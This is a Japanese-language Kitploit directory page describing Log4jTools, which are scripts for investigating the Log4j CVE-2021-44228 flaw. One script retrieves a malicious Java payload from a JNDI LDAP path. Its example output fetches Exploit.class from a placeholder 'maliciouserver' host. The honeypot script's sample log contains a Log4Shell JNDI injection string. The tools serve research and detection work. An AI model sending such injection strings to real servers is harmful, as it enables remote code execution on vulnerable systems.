Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Log4jTools — Log4j CVE-2021-44228 調査のためのツール | Kitploit
ツール/GitHubGitHub/malwaretech/log4jtools
ペイロード生成脆弱性分析エクスプロイト情報収集侵入検知
GitHubmalwaretech/log4jtools

Log4jTools

Log4j CVE-2021-44228 調査のためのツール

リポジトリを見る
9412364年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Log4jツール

Log4j CVE-2021-44228 を調査するためのツール

バグの説明とデモ

https://www.youtube.com/watch?v=0-abhd-CLwQ

FetchPayload.py (JNDIルックアップで指定されたLDAPパスからJavaペイロードを取得)

必要条件: curl (システム), requests (Python)

コマンド例:

root@kitploit:~
python FetchPayload.py ldap://maliciouserver:1337/path

[+] getting object from ldap://maliciouserver:1337/path
[+] exploit payload: http://maliciouserver:80/Exploit.class
[+] seeing if attacker left behind un-compile payload http://maliciouserver:80/Exploit.java
[x] failed to find payload Exploit.java
[+] trying to fetch compiled payload http://maliciouserver:80/Exploit.class
[+] found payload and saved to file Exploit.class_

SimpleHoneypot.py ('${' の存在に基づいてエクスプロイト試行をキャッチするハニーポット)

必要条件: python3, asyncore

コマンド例:

root@kitploit:~
python3 SimpleHoneypot.py

[2021-12-09 13:00:00,000] Possible CVE-2021-44228 Attempt: 127.0.0.1:1111 -> port 8080 - GET /?id=${jdni:ldap://127.0.0.1:1389/hax} HTTP/1.1
ツールをダウンロード